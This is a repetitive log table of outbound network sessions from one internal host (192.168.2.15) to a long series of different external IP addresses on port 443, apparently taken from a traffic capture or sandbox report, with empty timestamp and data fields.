                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13193192.168.2.155608668.202.106.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13194192.168.2.1549174197.251.206.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13195192.168.2.153884061.23.8.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13196192.168.2.1546744211.217.142.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13197192.168.2.154443638.168.226.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13198192.168.2.154279849.185.208.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13199192.168.2.153424014.10.255.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13200192.168.2.154574043.210.117.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13201192.168.2.1551424167.143.192.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13202192.168.2.153480231.246.18.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13203192.168.2.153863437.116.201.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13204192.168.2.155780076.117.245.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13205192.168.2.1535884200.170.95.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13206192.168.2.154831424.11.249.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13207192.168.2.1542698108.122.150.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13208192.168.2.154311685.71.79.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13209192.168.2.1559784195.204.157.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13210192.168.2.154867638.92.154.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13211192.168.2.153844846.193.154.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13212192.168.2.1551404212.127.50.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13213192.168.2.155085017.209.165.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13214192.168.2.1537430201.166.169.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13215192.168.2.15461102.235.220.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13216192.168.2.1554292219.115.231.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13217192.168.2.1555474136.21.250.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13218192.168.2.1558138129.126.131.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13219192.168.2.155788878.17.228.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13220192.168.2.154691286.137.22.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13221192.168.2.1542288210.29.217.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13222192.168.2.1536160204.216.219.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13223192.168.2.154487892.226.30.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13224192.168.2.1558954177.18.149.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13225192.168.2.1559026118.36.248.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13226192.168.2.1543612133.180.37.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13227192.168.2.1545388149.39.97.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13228192.168.2.154363820.177.202.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13229192.168.2.155046684.183.235.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13230192.168.2.15435621.164.46.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13231192.168.2.154893273.177.8.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13232192.168.2.155533236.206.151.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13233192.168.2.153902667.176.144.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13234192.168.2.1550692132.236.147.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13235192.168.2.156074060.142.142.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13236192.168.2.15488825.98.97.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13237192.168.2.1534388177.57.222.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13238192.168.2.155647446.66.29.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13239192.168.2.154159095.68.94.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13240192.168.2.1558948154.38.3.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13241192.168.2.155964472.105.194.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13242192.168.2.155046414.11.179.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13243192.168.2.1551044134.114.142.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13244192.168.2.15429142.125.153.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13245192.168.2.1539868213.219.189.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13246192.168.2.1545236167.218.189.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13247192.168.2.153942065.239.7.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13248192.168.2.154167640.2.238.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13249192.168.2.155000252.239.48.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13250192.168.2.1559174158.93.8.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13251192.168.2.1536836184.63.106.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13252192.168.2.1556860208.32.210.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13253192.168.2.1559438145.95.96.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13254192.168.2.1537222199.83.221.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13255192.168.2.1534756141.57.134.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13256192.168.2.1544184141.28.238.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13257192.168.2.153499646.17.152.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13258192.168.2.1552586118.79.91.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13259192.168.2.1552006105.64.105.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13260192.168.2.1558734193.90.225.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13261192.168.2.1550534131.123.96.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13262192.168.2.1534924116.185.131.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13263192.168.2.154935295.241.7.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13264192.168.2.156052669.73.99.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13265192.168.2.1551996120.70.29.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13266192.168.2.1548954147.217.210.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13267192.168.2.1550634145.46.224.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13268192.168.2.1541504161.207.32.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13269192.168.2.1537540105.246.130.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13270192.168.2.1553976106.153.214.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13271192.168.2.1538918192.112.128.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13272192.168.2.153276868.41.174.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13273192.168.2.154768478.203.150.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13274192.168.2.1535242142.19.101.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13275192.168.2.15591825.8.179.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13276192.168.2.155530085.62.197.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13277192.168.2.1533956199.101.99.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13278192.168.2.1550584100.182.69.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13279192.168.2.1555048117.101.160.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13280192.168.2.1558360195.42.78.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13281192.168.2.153479877.147.60.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13282192.168.2.156004295.191.50.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13283192.168.2.1546790134.69.134.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13284192.168.2.1536302156.201.114.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13285192.168.2.155193412.216.147.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13286192.168.2.154100624.233.109.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13287192.168.2.153869846.255.39.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13288192.168.2.1547956114.106.103.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13289192.168.2.1555296211.98.118.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13290192.168.2.1552008205.22.252.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13291192.168.2.153600262.26.169.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13292192.168.2.1551626176.227.194.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13293192.168.2.155923054.237.243.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13294192.168.2.1547414202.204.66.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13295192.168.2.1532970129.103.117.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13296192.168.2.1543686207.200.198.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13297192.168.2.15560681.140.123.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13298192.168.2.154192679.117.7.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13299192.168.2.1542418198.137.147.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13300192.168.2.156097689.160.178.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13301192.168.2.154774482.22.120.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13302192.168.2.1548494109.216.162.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13303192.168.2.1553006125.121.172.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13304192.168.2.153914687.60.90.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13305192.168.2.155379671.196.116.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13306192.168.2.154110483.172.240.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13307192.168.2.1544758194.189.75.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13308192.168.2.155780258.222.200.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13309192.168.2.1542130176.170.49.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13310192.168.2.154771018.130.181.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13311192.168.2.1550414184.166.50.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13312192.168.2.155128066.58.1.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13313192.168.2.1560670145.127.152.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13314192.168.2.1545856135.22.147.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13315192.168.2.154650465.136.76.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13316192.168.2.155962684.39.21.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13317192.168.2.1548316193.119.36.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13318192.168.2.1556668133.95.247.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13319192.168.2.1543138124.134.99.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13320192.168.2.1560544147.2.8.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13321192.168.2.1546162212.115.38.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13322192.168.2.153294251.165.116.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13323192.168.2.1549258124.228.106.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13324192.168.2.1553672205.254.52.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13325192.168.2.1534482137.75.197.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13326192.168.2.155656895.196.136.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13327192.168.2.1538478201.157.90.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13328192.168.2.1546828106.194.23.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13329192.168.2.1549000206.228.211.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13330192.168.2.155519057.143.215.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13331192.168.2.15346009.37.47.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13332192.168.2.155960212.69.138.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13333192.168.2.1548842187.18.240.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13334192.168.2.1557744147.181.49.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13335192.168.2.1546972184.197.9.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13336192.168.2.1549960192.204.50.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13337192.168.2.155494651.231.32.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13338192.168.2.153603819.0.117.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13339192.168.2.1535334114.200.99.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13340192.168.2.155854040.144.105.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13341192.168.2.1538128175.72.109.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13342192.168.2.1546184183.158.80.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13343192.168.2.153566878.68.114.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13344192.168.2.1534976129.49.91.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13345192.168.2.1536562147.57.177.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13346192.168.2.1543932193.166.135.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13347192.168.2.1558014186.7.215.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13348192.168.2.153726076.208.138.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13349192.168.2.155059071.56.161.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13350192.168.2.1536010211.232.15.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13351192.168.2.155517667.204.26.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13352192.168.2.1534372203.116.166.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13353192.168.2.1533166141.94.68.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13354192.168.2.155186875.67.254.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13355192.168.2.155480691.59.254.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13356192.168.2.1553662121.106.66.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13357192.168.2.1554782207.162.228.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13358192.168.2.1560048191.88.25.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13359192.168.2.1555230112.177.14.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13360192.168.2.154632431.249.175.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13361192.168.2.1535412206.200.101.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13362192.168.2.154022035.180.236.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13363192.168.2.1547526129.14.5.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13364192.168.2.1548384144.99.205.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13365192.168.2.1549832103.156.3.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13366192.168.2.1553292123.188.30.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13367192.168.2.1559716122.135.130.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13368192.168.2.1551078218.128.115.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13369192.168.2.153759486.177.172.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13370192.168.2.155855094.230.72.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13371192.168.2.155952863.252.182.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13372192.168.2.153632876.201.123.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13373192.168.2.15539241.248.177.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13374192.168.2.1545482207.214.76.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13375192.168.2.154187639.245.27.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13376192.168.2.1546330136.78.226.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13377192.168.2.155026476.7.4.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13378192.168.2.1541712106.55.66.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13379192.168.2.1557322220.133.242.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13380192.168.2.1538826161.99.212.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13381192.168.2.1560476114.103.95.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13382192.168.2.1550900165.3.124.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13383192.168.2.155686897.84.4.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13384192.168.2.1554720181.190.20.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13385192.168.2.1546876104.216.184.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13386192.168.2.154325046.130.159.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13387192.168.2.155653458.137.21.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13388192.168.2.1539476137.153.9.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13389192.168.2.1558206218.207.78.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13390192.168.2.1537460164.42.109.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13391192.168.2.1554186145.105.201.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13392192.168.2.1559414197.151.130.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13393192.168.2.1535014200.136.168.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13394192.168.2.1543050117.188.221.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13395192.168.2.154394096.239.209.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13396192.168.2.154027647.102.38.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13397192.168.2.1554424161.65.91.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13398192.168.2.155436247.155.189.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13399192.168.2.154338232.159.102.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13400192.168.2.1547790152.235.107.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13401192.168.2.1548124190.221.51.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13402192.168.2.153557676.38.173.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13403192.168.2.1555428190.198.25.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13404192.168.2.1554374108.224.227.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13405192.168.2.154412417.211.86.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13406192.168.2.1536062118.255.229.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13407192.168.2.154357453.159.211.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13408192.168.2.1535322198.205.66.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13409192.168.2.154610235.36.202.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13410192.168.2.1556046177.106.50.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13411192.168.2.1544260188.133.214.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13412192.168.2.1543022218.52.213.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13413192.168.2.1542080200.226.243.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13414192.168.2.154084694.9.49.143443
